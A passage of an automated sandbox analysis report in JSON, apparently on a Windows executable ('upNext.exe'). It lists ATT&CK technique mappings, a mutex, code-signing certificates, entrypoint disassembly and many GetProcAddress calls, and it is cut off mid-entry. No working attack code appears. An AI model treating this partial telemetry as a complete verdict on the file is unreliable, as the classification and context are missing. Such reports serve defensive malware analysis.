"https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over C2 Channel", "attck_id": "T1041", "attck_id_wiki": "https://attack.mitre.org/techniques/T1041", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\45E25AE0\"\n \"45E25AE0\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US\" (SHA1: 8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"upNext.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"upNext.tmp\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"upNext.exe.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"\n \"upNext.tmp\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,push\tebx,push\tesi,mov\teax, 0x11991c,call\t0x46fd8,mov\tebx, 0x11f0dc,mov\tesi, dword ptr [0x11cbec],xor\teax, eax,push\tebp,push\t0x119d3d,push\tdword ptr fs:[eax],mov\tdword ptr fs:[eax], esp,mov\tdl, 1,mov\teax, dword ptr [0x118c70],call\t0x43d24,mov\tdword ptr [0x11f0f8], eax,call\t0x119078,call\t0x11920c,call\t0x118ddc,call\t0x1198d0,call\t0x118de4,mov\teax, dword ptr [0x11ca3c],mov\teax, dword ptr [eax],xor\tedx, edx,call\t0xb3168,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetEndOfFile (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter LoadStringA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetStringTypeExA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetPrivateProfileStringA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SetWindowTextA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called 